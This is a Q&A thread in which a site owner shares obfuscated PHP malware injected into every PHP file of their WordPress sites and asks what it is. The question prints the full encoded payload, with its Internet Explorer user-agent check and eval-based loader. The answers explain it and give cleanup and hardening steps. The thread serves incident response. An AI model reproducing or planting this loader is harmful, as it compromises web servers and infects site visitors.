-2

I have like 10 websites on my account using WordPress and some custom coded websites. But all of my website files have this code at the beginning of every PHP file:

<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $pxcnlrwjvb = '#!%x5c%x782f!**#sfmcnbs+yfeobz+sfwjidsb%x5c%x7860bj+upcotn+qsvm)udfoopdXA%x5c%x7822)7gj6<*QDU%x5c%x7860MPT7-NBFSUT%h1:|:*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutjyf%{fpg)%x5c%x7825%x5c%x7824-%x5c%x7824*<!~!dsfbuf%x5c%x7860gvy33]65]y31]55]y85]82]y76]62]y3:]887fw6*%x5c%x787f_*#[k2%x5c%x7860{6:!%x7825s:%x5c%x785c%x5c%x7825j:.2^,%x5c%x7825b:<!%x5c%x7825c:>%x5c%x78bT-%x5c%x7825bT-%x5c%x7825hW~%x5c%x7825fdy)##-!#~<%x5c%x7825hc%x7825Z<^2%x5c%x785c2b%x5c%x7825!>!2p%x5c%x7825!*3>?*2b%x78256|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-n%uhA)3of>2bd%x5c%x7825!<5h%x5c%x7825%x5c%x782f#0#%x5c%x782f*#npd%x5c%<3,j%x5c%x7825>j%x5c%x78254-%x5c%x7824-tusqpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c%x7x782f#)rrd%x5c%x782f#00;quui#>.%x5c%x7c%x7825)tpqsut>j%x5c%x7825!*72!%x5c%x3a%146%x21%76%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y60msvd},;uqpuft%x5c%x7;!osvufs}%x5c%x787f;!opjudovg}k~~9{d%x5c%x7825:osv76]271]y7d]252]y74]256#<!%x5c%x7825ggg)(0)%x5c%x782f+*0f(-!860sfqmbdf)%x5c%x7825%x5c%x7824-%x5c%x7824y4%x5c%x7824-%x5c%x7824]y8%xFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*UFH#%x5c%x7827rfs%x5c%x78256~6<%x5c%x787fw824-%x5c%x7824y7%x5c%x7824-%x5c%x7824*<!%x5c%x7PMSVD!-id%x5c%x7825)uqpuft%x5c%x787827!hmg%x5c%x7825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%xbek!~!<b%x5c%x7825%xV%x5c%x787f<*XAZASV<*w%x5c%x7825)ppde>u%x5c%x7825V<#65msv}.;%x5c%x782f#%x5c%x782f#%x5c%x782f},;#-#}+;%x5c%x7825-qp%x5c%x7825282#<!%x5c%x7825tjw!>!#]y84]275]y83%x7825!<12>j%x5c%x7825!|!*#91y]c9y]g2]y72]265]y39]274]y85]273]y6g25j:,,Bjg!)%x5c%x7825j:>>1*!%x5c%x7825b:>1<!fmtf!%x5c%x7825b:>%x5c6<*K)ftpmdXA6|7**197-2qj%x5c%x78257-KD#)sfebfI{*w%x5c%x782UPNFS&d_SFSFGFS%x5c%x7860QUUI&x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]n%x5c%x7825-#+I#)q%x5c%x7825:>:r%x5c%x7825:|:**t%xd%x5c%x78256<%x5c%x787fw%x7860ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x7825)}.;%x5c%x7860UQwTW%x5c%x7825hIr%x5c%x785c1^-%x55c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x782B#-#T#-#E#-#G#-#H#-#I#-#K#37]88y]27]28y]#%x5c%x782fr%x5c%x7825%x5c%x782fh%x5c%x7825)x787fw6*CW&)7gj6<.[A%x5c%x7827&6<%x5c%x75c%x7825z!>2<!gps)%x5c%x7825j>1<%x5c%x7825j=6[%x5c%x7825ww2!>#p#%x%x787f<u%x5c%x7825V%x5c%x7827{ftmfV%x5c%x787f<*X&Z&S{ftmf275L3]248L3P6L1M5]D2P4]D6#<%x5c%x7825G]y6d]281Ld]245]K2]285]Kx5c%x78604%x5c%x78223}!+!<+{e%x5c%x7825+*!*+fepdfe{h+{d%x5c%x782V;3q%x5c%x7825}U;y]}R;2]},;5:52985-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]8fubfsdXA%x5c%x7827K6<%x5c%x787fw6*3qj%x5c%x78257>%x5c%x783]238M7]381]211M5]67]452]88]5]48]3293e:5597f-s.973:8297f:5297e:56-%x5c%x7878r.98Ypp3)%x5c%x7825cB%x5c%x7825iN}#-!tussfw)%x5c%x7825}7;!}6;##}C;!>>!}W;utpi}Y;tuofu|!*msv%x5c%x7825)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%x5c%xopjudovg}{;#)tutjyf%x5c%x7860opjudovg)!gj!64") && (!isset($GLOBALS["%x615c%x7878Bsfuvso!sboepn)%x5c%x7825epnb!gj!|!*1?hmg%x5c%x7825)!gj!<**2-4-bubE{h%x5c%x7825)sutcvt)esp>hmg%x5c25w%x5c%x7860%x5c%x785c^>Ew:Qb:Qc:W~!%x)54l}%x5c%x7827;%x5c%x7825!<*#}_;#)323ldfid>}&^%x5c%x7824-%x5c%x7824tvctus)%x5c%x7825%x5c%x7824-%x5c%x782%x5c%x7825)7fmji%x5c%x78786<C%x5c%x7827&6<*rfs%x5c%x#<%x5c%x7825yy>#]D6]281L1#%x5c%x782f#M5]DgP5]D6#<%x5c%x5c%x7825)utjm6<%x5c%x787fw6*CW&)7gj6<*K)ftpmdXA6~6<u%xopd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5c%x7825}K;%x5c)#%x5c%x7824*<!%x5c%x7825kj:!>!#]y3d]51]y35]256]y76]72]y5c%x7824<%x5c%x78e%x5c%x75w6Z6<.4%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Zufs:~928>>%x5c%x7822:ftmbg39*56A:>:8:|:7#6#)t7825)m%x5c%x7825):fmji%x5c%x7878:<##:>:h25wN;#-Ez-1H*WCw*[!%x5c%x7825rN}#Qe%x5c%x78b%x5c%x7825w:!>!%x5c%x78246767~6<Cw6<pd%x5c%x7825w6Z6<.5%xc*W%x5c%x7825eN+#Qi%x5c%x785c1^W%x5c%x7825c!>!%x5c%x7825i%x5c1%160%x28%42%x66%152%x66%147%x67%42%x2c%163%x74%162%x5f7825o:!>!%x5c%x78242178}527}88:}334}472%x5c%x7824<!%x5c%x7825mm!4b!>!%x5c%x7825yy)#}#-#%x5c%x782]273]y76]271]y7d]252]y74]256]y39]252]y83]273]y72]%x787f%x5c%x787f%x5c%x787f%x5c7860hfsq)!sp!*#ojneb#-*f%x5c%x78K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%x5c%x7825tpz!>!#]D6M7]K3%x7878<~!!%x5c%x7825s:N}#-%x5c%x7825o:W%x5c%x7825c:>1<%x5c%x7825b:>odujpo)##-!#~<#%x5c%x9f5d816:+946:ce44#)zbssb!>!00#*<%x5c%x7825nfd)##Qtpz)#]341]88M4P8]37]278]225]241]334]368]322]36*%x5c%x787f_*#fubfsdXk5%x5c%x7860{66~6<&w25)sf%x5c%x7878pmpusut)tpqssutRe%x5c%x7825)Rd%x5c%x7825r%x5c%x785c2^-%x5c%%160%x6c%157%x64%145%x28%141%x72%162%x61%171%x5f%155%x6x5c%x7825z>!tussfw)%x5c%x7825zW%x5c%x7825h>EzH,2W%x5c%x78%156%x75%156%x61"])))) { $GLOBALS["%x61%156%x75%156%x61"]=1; functioc%x7825)Rb%x5c%x7825))!gj!<*#cd2bge56+99386c6f+25)!>>%x5c%x7822!ftmbg)!gj<*#k#)usbut%x5c%x7860cpV%x5c4#-!OVMM*<%x22%51%x29%51%x29%73", NULL); }%x5c%x7825:<#64y]552]e7y]#>n%x5c%x7825<#372]58y]4id%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78256<*17-SFEB%x5c%x787f;!osvufs}w;*%x5c%x787f!>>%x5c%x7822!pd%x5c%x7825)!gj}Z;h!%163%x70%154%x69%164%50%x)323zbe!-#jt0*?]+^?]_%x5c%x785c}X%x5c%x7824<!%x5c%x7825tzw>!#]y76]2777825!<*::::::-111112)eobs%x5c]58]24]31#-%x5c%x7825tdz*Wsfc%x785cq%x5c%x7825)ufttj%x5c%x7822)gj6<^#Y#%x5c%x785cq%sv%x5c%x78256<C>^#zsfvr#%x5c%x785cq%x5c%x78257**^#zsfvr#%x522%134%x78%62%x35%165%x]y76]271]y7d]252]y74]256#<!%c%x7825fdy<Cb*[%x5c%x7825h!>!%x5c%x7825tdz)%x5c%x7825b824-%x5c%x7824gps)%x5c%x7825j>1<%x5c%x7825j=tj!*3!%x5c%x7827!hmg%x5c%x7825!)!gj!<2,*j%x5c%x7825!-#1]#-bubE{h%x55c%x7827)fepdof.)fepdof.%x5c%x782f#@#%x5c%x782fqp%x5c%x7825>5h%x5c%x256]y6g]257]y86]267]y74]275]y7:]268]y7f#<!%x5c%x7825tww!>!%x5c%*!|%x5c%x7824-%x5c%x7824gvodujpo!%x5c%x7n fjfgg($n){return chr(ord($n)-1);} @error_reporting(0); preg_re>!#]y84]275]y83]273]y76]277#<%x5c%x7825t2w>#]y74]273]y76]252]y85]66,#%x5c%x782fq%x5c%x7825>2q%x5c%x7825<#g6R85,67R37,18Rssbnpe_GMFT%x5c%x7860QIQ&f_UTPI%x5c%x7860QUUI&e_SEEB%x5c%x7860F60hA%x5c%x7827pd%x5c%x78256<C%x5c%x7827pd%x5c%f35.)1%x5c%x782f14+9**-)1%x5c%x782f2986+7**^%x5c%x782f%x5c%x7825r%x5cx5c%x7860LDPT7-UFOJ%x5c%x7860GB)!|!*!***b%x5c%x7825)sf%x5c%x7878pmpusut!-#j06<.3%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.2%x5c%x78825!*##>>X)!gjZ<#opo#>b%x5c%x78257825-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA!osvufs!~6*%x5c%x787f_*#ujojRk3%x5c%x7860{666~6<&w6<%x5c%y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubif((function_exists("%x6f%142%x5f%163%x74%141%x72%17825)tpqsut>j%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofmy%x58b%x5c%x7825ggg!>!#]y81]273]y76]258]y6g]273]y*%x5c%x7824%x5c%x782f%x5c%x7825kj:-!OVMM*<(<%x5c%x78e%x5c%x7c%x7860{6~6<tfs%x5c%x7825w6<%x5c%x787fw6*CWt5c%x78257>%x5c%x782f7&6|7**111127-K)ebfsX%x5c%x7827ux5c%x7825!<**3-j%x5c%x7825-bubE{h%x5c%x7825)sutc5c%x7824-%x5c%x7824]26%x5c%x7824-%x5c%x7824<%x5c%x7825j,,x7860QUUI&b%x5c%x7825!|!*)323z5c%x7825:-t%x5c%x7825)3of:opjudovg<~%x5c%x7824<!%x5c%xx5c%x7824-%x5c%x7824-!%x5c%x7825%x5c%x7824-%x5c%x7824*!|!%3f]63]y3:]68]y76#<%x5c%x78%x785c2^<!Ce*[!%x5c%x7825cIjQeTQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%xutjyf%x5c%x7860439275ttfsqnpdov{h19275j{hnpd19275fubmgoj{2272qj%x5c%x7825)7gj6<**2qj%x5c%x7825)hopm3qjA)qj3hopmA%x5c%825!-uyfu%x5c%x7825)3of)fepdof%x5c%x7860place("%x2f%50%x2e%52%x29%57%x65","%x65%166%x61%154%x28%151%x6dc%x7825w%x5c%x7860TW~%x6<%x5c%x787fw6*CW&)7gj6<*doj%x5-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#5c%x782f#p#%x5c%x782f%x5c%x7825z<jg!)%x5c%x7825z>>2*!%x5c%x7%x7860un>qp%x5c%x7825!|Z~!<##!>!2p%x5c%x7825|!*5!%x5c%x7827!hmg%x5c%x7825)825z>3<!fmtf!%x5c%x7825z>2<!%x5c%x7825ww2)%x5vt-#w#)ldbqov>*ofmy%x5c%x7825)utjm!3d]51]y35]274]y4:]82]y3:]62]y4c#<!%x5c%x7825t::!>!%x5c%x7824,47R25,d7R17,67R37,#%x5c%x256<.msv%x5c%x7860ftsbqA7>q%x5c%x78256<%x5c%x787fwE{h%x5c%x7825)j{hnpd!opjudovg!|!5c%x7825)s%x5c%x7825>%x5c%x782fh%x5c%x7825:<**#57]38y]47]67y]c_UOFHB%x5c%x7860SFTV%x5c%B%x5c%x7825h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.f7#@#7%x5c%x782f7^#iubq#%x5c%x785cq%x5c%x7825%x5c%x7827j]248]y83]256]y81]265]y72]254]y76#<%x5c%x7825tmw!56]y81]265]y72]254]y76]61]y33]68]y34]68]y33]65]y31]53]y6d]281]y43]78]tmf!}Z;^nbsbq%x5c%x78x7825hOh%x5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x5c%x7825827{**u%x5c%x7825-#jt0}Z;0]=]0#)2q%x5c%x7825l}S;2-u%x5c%x7825!-#2#%xx5c%x7825%x5c%x7827Y%x5c%x78c%x7825}X;!sp!*#opo#>>}R;72]37y]672]48y]#>s%x5c%x7%x782f%x5c%x7824)#P#-#Q#-#x5c%x7825ff2!>!bssbz)%x5c%x7824]25%x78273qj%x5c%x78256<*Y%x5c%x7825)fnbozc%x7878;0]=])0#)U!%x5c%x7ss-%x5c%x7825r%x5c%x7878W~!Ypp2)%x5c%x7825zB%c%x7822#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)ec%x7825,3,j%x5c%x7825>j%7822)!gj}1~!<2p%x5c%x7825%x5c%x787f!~!<##!>!2p%x5osvufs}%x5c%x7827;mnui}&;zepc}A;~!}%x5c%x787f;!|!}{;)7&6<.fmjgA%x5c%x7827doj%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fmjgk4%x525%x5c%x785cSFWSFT%x5c%x7860%x5%x5c%x782f7rfs%x5c%x78256<#o]1%x5c%x782f20QUUI7jsv%x5c%x78257e]53Ld]53]Kc]55Ld]55#*<%x5c%x7825bG9}:}.}-}!#*<%x5c%x7825nfd>%x5t+fmhpph#)zbssb!-#}#)fepmqnj!%x5c%x782f!#0#)idubn%x5c%xc%x78257-C)fepmqnjA%x5c%x7825c%x7825)m%x5c%x7825=*h%x5c%xuvso!%x5c%x7825bss%x5c%x785csboe))1%x5c%x782#>q%x5c%x7825V<*#fopoV;hojepdoF.uofuopfs%x5c%x7825)7gj6<*id%x5c%x7825)ftpmdR6<*5c%x782f#%x5c%x7825#%x5c%x782f#o]#%x5c%x782f*825<#462]47y]252]18y]#>q%x5c%x7825<#762D4]275]D:M8]Df#<%x5c%x7825tdz>#L4]5)+opjudovg+)!gj+{e%x5c%x7825!osvufs!*!+A!>!{e%x5c%x78**#j{hnpd#)tutjyf%x5c%x7860opjudovg%x5c%x!**X)ufttj%x5c%x7822)gj!|!*nbsbq%x5c%x7825)323ldfidk!~!<**qp%x5c%x7825!<***f%x5c%x7827,*e%x5c%x7827,*d%x5c%x7827,*c%x5c%x7827,*b%x782f%x5c%x7825%x5c%x7824-%x5c%x7824!>!fyqmpef25s:%x5c%x785c%x5c%x7825j:^<!%x5c%x785c%x787f!<X>b%x5c%x7825Z<#opo#>b%x5c%x7]67y]562]38y]572]48y]#>m%x5c%x7825:|:*r%xx782400~:<h%x5c%x7825_t%x5c%x7825:osvufs:~:<*9-1-r%x1<!gps)%x5c%x7825j:>1<%x5c%x7825j:=tj{fpg)%x5c%x7825s:*<%x5c%x781#%x5c%x782f#7e:55946-tr.984:75983:48984:71]>!#]y81]273]y76]258]y6g]273x5c%x7825)gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%x5#]y76]277]y72]265]y39]271]y83]256]y78]248]y83]2x5c%x7824-%x5c%x7824%x5c%x785c%x5c%x7825jcYufhA%x5c%x78272qj%x5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x78257%x5c%x782tmw)%x5c%x7825tww**WYsboepn)%x5c%x7825bss-%x5c%x7825r%x5c%x78785)kV%x5c%x7878{**#k#)8b%x5c%x7825mm)%x5c%x7825%x5c%x7878:-!%x5c%x7825tzw%x5c78257-K)fujs%x5c%x7878X6<#o]o]Y%x5c%x78257;utpI#7>M3]317]445]212]445]43]321]464]284]364]6]234]34257ftbc%x5c%x787f!|!*uyfu%x5c%x7827k:!fgj}l;33bq}k;opjudovg}%x5tutjyf%x5c%x7860%x5c%x7878%x5c%x7822l:!}782fq%x5c%x7825>U<#16,47R57,27Rmsv%x5c%x78257-MSV,6<*)ujojR%x5c%x7827i]364]6]283]427]36]373P6]36]73]8860msvd}+;!>!}%x5c%x7827;!>>>!}_;gvc%x5c%x7825}&;ftmbg}/(.*)/epreg_replaceodbdxuijoz'; $zificdtoeq = explode(chr((191-147)),'6002,51,2681,30,4294,68,5324,64,6819,63,4182,55,3563,55,4672,25,4937,23,787,53,6566,26,3435,67,1865,45,3257,59,5762,67,5571,46,487,61,3067,55,6267,52,2961,52,9751,50,8358,61,1083,42,1572,37,63,52,5686,32,2365,57,6719,60,7963,38,9542,70,7496,56,4878,59,4823,55,7824,28,7272,50,4066,42,6905,31,8538,28,8257,70,6223,44,8677,41,4554,51,1041,42,9981,39,1747,24,5910,48,1994,40,264,36,2552,31,3122,54,1771,62,1172,34,840,22,10051,55,4605,67,2639,42,2583,56,5862,48,616,26,5088,65,750,37,1206,56,6053,65,8131,24,6319,48,7151,35,7076,30,2748,69,1441,37,5958,44,7322,32,8890,41,8155,49,430,57,9410,44,8071,60,548,68,712,38,8998,63,5153,68,4766,29,7032,44,5718,44,0,63,8483,55,3793,32,4108,48,4362,47,3972,27,5508,63,1630,30,7415,26,6424,30,1262,20,9143,39,5829,33,8931,67,6779,40,9848,38,7669,21,8327,31,7852,25,1336,70,2856,46,862,50,3316,45,6662,57,115,57,2218,64,8836,54,4409,54,3763,30,2100,57,1282,54,7246,26,9950,31,5453,55,8639,38,1609,21,9675,21,9910,40,2282,27,8204,53,9886,24,8001,25,7756,68,8718,45,4697,69,1478,28,3714,49,1406,35,7552,48,5388,65,5221,63,9223,52,7354,61,1936,58,1697,50,8566,29,3361,40,4505,49,7877,25,8763,39,9182,41,6454,54,3618,64,9383,27,4960,28,7928,35,6508,58,9501,41,2902,59,3682,32,642,70,971,70,6367,57,5284,40,1125,47,5042,46,172,59,3951,21,9061,45,3176,56,7186,60,2502,50,3502,61,6592,70,2711,37,8026,45,4237,57,3401,34,1833,32,4156,26,7690,66,9612,63,7441,55,2457,45,2309,56,9339,44,3825,59,3013,54,1660,37,8802,34,2157,61,8419,64,4988,54,369,61,3999,67,10020,31,2422,35,9801,47,4795,28,8595,44,5617,69,3884,67,9275,64,1506,66,300,69,9106,37,2817,39,2034,66,6972,60,7106,45,6882,23,3232,25,9696,55,7902,26,1910,26,6936,36,6163,60,6118,45,912,59,9454,47,7600,69,231,33,4463,42'); $geaesgccre=substr($pxcnlrwjvb,(34730-24624),(33-26)); if (!function_exists('yuihikjfsn')) { function yuihikjfsn($uxjajytpri, $phxiepyqfi) { $gbuorasllr = NULL; for($hxqvsjayug=0;$hxqvsjayug<(sizeof($uxjajytpri)/2);$hxqvsjayug++) { $gbuorasllr .= substr($phxiepyqfi, $uxjajytpri[($hxqvsjayug*2)],$uxjajytpri[($hxqvsjayug*2)+1]); } return $gbuorasllr; };} $mroodsipsd="\x20\57\x2a\40\x79\152\x62\152\x71\165\x64\143\x61\152\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\63\x39\55\x32\60\x32\51\x29\54\x20\143\x68\162\x28\50\x34\70\x34\55\x33\71\x32\51\x29\54\x20\171\x75\151\x68\151\x6b\152\x66\163\x6e\50\x24\172\x69\146\x69\143\x64\164\x6f\145\x71\54\x24\160\x78\143\x6e\154\x72\167\x6a\166\x62\51\x29\51\x3b\40\x2f\52\x20\156\x6b\163\x74\152\x74\150\x68\164\x6d\40\x2a\57\x20"; $kmfixnnsec=substr($pxcnlrwjvb,(44369-34256),(59-47)); $kmfixnnsec($geaesgccre, $mroodsipsd, NULL); $kmfixnnsec=$mroodsipsd; $kmfixnnsec=(477-356); $pxcnlrwjvb=$kmfixnnsec-1; ?>

What is this and how do I get rid of it?

Anders
  • 65,052
  • 24
  • 180
  • 218
  • Why the down votes? – Stone True Nov 21 '15 at 16:22
  • "how to get rid of it" is to simply delete it. I think what you want to ask is "how do I prevent the attacker from putting it right back" which can be too difficult to answer. If someone is able to write to these files, you do not know how far they have gone. – schroeder Nov 21 '15 at 16:38
  • 2
    I'll guess about the downvotes (they're not mine): we see a lot of these questions and people feel you should have found the answer on your own. The tone of your question is informal. It starts with `I have like 10 websites` - a bad start. The whole tone of the question seems like you want us to work harder at answering your question than you did at writing it. Also, I think questions by users with default usernames are valued less as people feel the questioner is less serious. Just my guesses. Hope they help. – Neil Smithline Nov 21 '15 at 19:31

2 Answers2

3

This is some attack against the visitors of your website. From a short look the attack is specific for users of Internet Explorer except version 11 (checks HTTP_USER_AGENT against string 'msie' but not 'rv:11') so I guess this will send some JavaScript to the client which will drop some malware to the local file system and execute it with the help of ActiveX.

What you should do: shut your site down so that no more visitors are affected and you don't get blacklisted by GoogleSafeBrowsing or similar. Then find the attack vector, clean the site and only after you are sure that everything is ok (better get outside help) put the site back online.

For more information see How do I deal with a compromised server?.

Steffen Ullrich
  • 190,458
  • 29
  • 381
  • 434
2

Here's a link to the (somewhat) decoded version of the obfuscated PHP code: http://www.unphp.net/decode/1c5864c7dab6740edcdf8ece8cb8a8ee/

As far as to get ride it, I'd recommend going over your log files to determine how they got in and were able to modify your files.

Once that has been determined, you should somehow (I know this is vague, perhaps once you've discovered something from the log you can ask another question again) try to prevent them from things.

Other questions you should ask yourself is:

  1. How frequently do I update Wordpress (if at all)?
  2. What additional plugins do I use and do I update these?
  3. Did I harden my Wordpress installation? (Use Google)

Additionally you can perform a test on your Wordpress sites using wpscan. WPScan can be found at http://wpscan.org/ and is a tool used by penetration testers to determine its version, used plugins and its versions, enumerate usernames and brute force credentials.

Although determining what was done is considered a good thing to prevent this from happening again, I think you should consider your server(s) compromised.

Suggested actions:

  1. Investigate log files (apache/nginx/mysql/access logs)
  2. Investigate file system for backdoors, web shells and reverse shells
  3. Change passwords (not only on the server if passwords are used in other accounts as well.)
  4. Investigate the backups (assuming you have backups) contain the modified PHP file(s). Make sure you have a backup that does not contain modified files.
  5. Learn and understand how they compromised your server.
  6. Re-install your server.
  7. Restore "good" backups

Good luck!

Jeroen
  • 5,813
  • 2
  • 19
  • 26
  • Good answer. I'd add to the list a check for files date and time modifications. Also, there are WP plugins that will compare MD5's of files against a "known clean" list, and thus be able to identify attacks. Finally, on some servers there are methods (famd, tripwire...) to stop an attack as soon as it has happened. **Not** a complete protection by any means, of course, but useful against most zero-day exploits. – LSerni Nov 21 '15 at 11:51
  • It seems that shutting down your sites has to be the first thing you do. – Neil Smithline Nov 21 '15 at 19:20